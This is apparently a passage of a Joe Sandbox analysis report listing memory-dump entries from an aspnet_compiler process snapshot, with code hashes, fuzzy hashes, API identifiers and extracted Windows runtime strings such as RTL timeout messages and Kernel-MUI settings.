                                                    • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                    • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                    • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                    • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                    • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                    • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                    • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                    • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                    • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                    • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    APIs
                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 00A987C1
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                    • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    • Opcode ID: 91b8789fab85c9fa39730a2bdcec1c429cb8faed84ba298ae40b10c9de59b2ef
                                                    • Instruction ID: 0f7c0023ea2f2e9d392612a68447ab364dd37c9167abe8433d80c462b2efd06f
                                                    • Opcode Fuzzy Hash: 91b8789fab85c9fa39730a2bdcec1c429cb8faed84ba298ae40b10c9de59b2ef
                                                    • Instruction Fuzzy Hash: 5841D572240319BEEB019AD1DC82FDEBBECAF08B44F100152BA44E60D1DBB0DB008FA4
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                    • Instruction ID: 73cc18af1fa9017f7925262be259ede0acc4c2233492ba7f3f330d7c579eb102
                                                    • Opcode Fuzzy Hash: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                    • Instruction Fuzzy Hash: 4F613BB1900655AACB34DF59C8A08FFBBF9EF94300754C42EF4DA4B642E3349A40DBA0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 88af2bce79a17bb3cc90be2ceda98a5521076df1e0fc898bf03ee77349a4797a
                                                    • Instruction ID: 5d17bc7fe7ecc365ab70aaddfe6af5e5d318595b264c93c2d89ffdf70e67f0db
                                                    • Opcode Fuzzy Hash: 88af2bce79a17bb3cc90be2ceda98a5521076df1e0fc898bf03ee77349a4797a
                                                    • Instruction Fuzzy Hash: 096190B6904748AECF20DF59C8414BEBBF5EF54710B54C5AAF8ADA7141F234EB809B90
                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AC3F12
                                                    Strings
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AC3EC4
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00ACE2FB
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AC3F75
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AC3F4A
                                                    • ExecuteOptions, xrefs: 00AC3F04
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00ACE345
                                                    • Execute=1, xrefs: 00AC3F5E
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                    • Instruction ID: a8651ef1699448fbfff9239e1310a2b11b3e1fff0a88065a6d8e25aa8ed3b3ee
                                                    • Opcode Fuzzy Hash: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                    • Instruction Fuzzy Hash: A9419572A4031C7ADF20DB94DD86FDF73BCAB15700F0085A9B509A71C1EB70AB458BA1
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: c8c82aeadabb0ebd0fed61d8f7a7588cdaaf12bc93c51caf5d738e2111e35faa
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: 09A17C7190030AEFCB24DF64C855AFFBBBCAF16305F2485AAD852A7283D7349A41DB51
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD2206
                                                    Strings
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                    • Instruction ID: 1bd93c8488373b71905e1c8b4630c2df579ce163bbfd0c77ee2a0a865f7c9e53
                                                    • Opcode Fuzzy Hash: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                    • Instruction Fuzzy Hash: 2851FC327042116FDB159B14CC81FA673A9AFA8720F21C66AFD5ADF386DA71EC41C790
                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 00ADEA22
                                                      • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB146B
                                                      • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB1490
                                                    • ___swprintf_l.LIBCMT ref: 00AB156D
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                    • Instruction ID: 3e4ed00255f70ca0db467dfbb1e8b9f7557caccd607026d6cbaab95e543ba714
                                                    • Opcode Fuzzy Hash: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                    • Instruction Fuzzy Hash: F521C372900219ABCB30DF54CD51AEF73BCBB50701F848552FC4AD7142DB70AA598BE0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 8fb5fc8b60e55dfed5ca5bd37995dafd1a2e2239c7af32743225f5a644a11d86
                                                    • Instruction ID: 268769bbc04491396eda88f1dd5ee8f744e10468f21c684679bf3ace20326f59
                                                    • Opcode Fuzzy Hash: 8fb5fc8b60e55dfed5ca5bd37995dafd1a2e2239c7af32743225f5a644a11d86
                                                    • Instruction Fuzzy Hash: D221A1B390022AABCB10AF65DC459EF77ECEB14B14F4445A6FC0897141F7709E9487E1
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00AD2328
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                    • RTL: Resource at %p, xrefs: 00AD230B
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                    • Instruction ID: cd9ccc99a3cf90f74e2ff6bb3b61c0381724d4bc931ada5cbeb2ee8193e732a4
                                                    • Opcode Fuzzy Hash: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                    • Instruction Fuzzy Hash: 9051D4727006056BDF119B38DD92FA773E8AF58360F11462AF919DF282EA61E941C7A0
                                                    Strings
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AD24BD
                                                    • RTL: Re-Waiting, xrefs: 00AD24FA
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AD248D
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                    • Instruction ID: f11e6a1eaff6db1fe2eea082ce974e9f3744e7dcae54dc36853e7edae2e0f247
                                                    • Opcode Fuzzy Hash: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                    • Instruction Fuzzy Hash: 2341C5B1600204ABCB20DB68DD85FAA77F8AF44720F20C656F95A9B3C2D774E941C7A0
                                                    APIs
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: 6a50e41646b47c1980c265edfacf295a30a039e2d4310635294674c490e1da3c
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: CD916D71E0024AEFDF28DF98C8456AEB7B4EF56314F24807AD451AB2A2E7305A41CB91
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: $$0
                                                    • API String ID: 1302938615-389342756
                                                    • Opcode ID: bb74095c90da877abe7435c5b7bb5633962ed9aa1acbadf8bd31480f3049520a
                                                    • Instruction ID: 607d17a0257ac63cbecaab47290664ce70efb2641079f61a36ac66868d9c3721
                                                    • Opcode Fuzzy Hash: bb74095c90da877abe7435c5b7bb5633962ed9aa1acbadf8bd31480f3049520a
                                                    • Instruction Fuzzy Hash: BC91AF70D046AAAEDF34DFA8A5447EDBBF0EF01350F1446EAD8A9A7291C3744A41CB51